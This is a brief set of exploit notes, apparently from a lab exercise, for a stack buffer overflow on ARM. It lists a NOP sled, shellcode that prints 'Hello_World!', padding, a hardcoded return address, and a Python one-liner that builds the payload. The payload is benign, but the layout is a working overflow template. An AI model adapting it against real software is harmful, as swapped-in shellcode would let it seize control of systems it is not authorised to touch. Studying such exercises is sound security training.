Code:
NOP code: \x01\x10\xa0\xe1 (mov r1, r1) 

shellcode: \x01\x30\x8f\xe2\x13\xff\x2f\xe1\x40\x40\x02\xa1\x0d\x22\x04\x27\x01\xdf\x01\x27\x01\xdf\x48\x65\x6c\x6c\x6f\x5f\x57\x6f\x72\x6c\x64\x21\xc0\x46

Junk(bytes for padding): \x41\x41\x41\x41

Return Address: \x70\xf3\xff\xbe

exploit: run $(python -c 'import sys
sys.stdout.buffer.write(b"\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x40\x40\x02\xa1\x0d\x22\x04\x27\x01\xdf\x01\x27\x01\xdf\x48\x65\x6c\x6c\x6f\x5f\x57\x6f\x72\x6c\x64\x21\xc0\x46\x41\x41\x41\x41\x70\xf3\xff\xbe")')
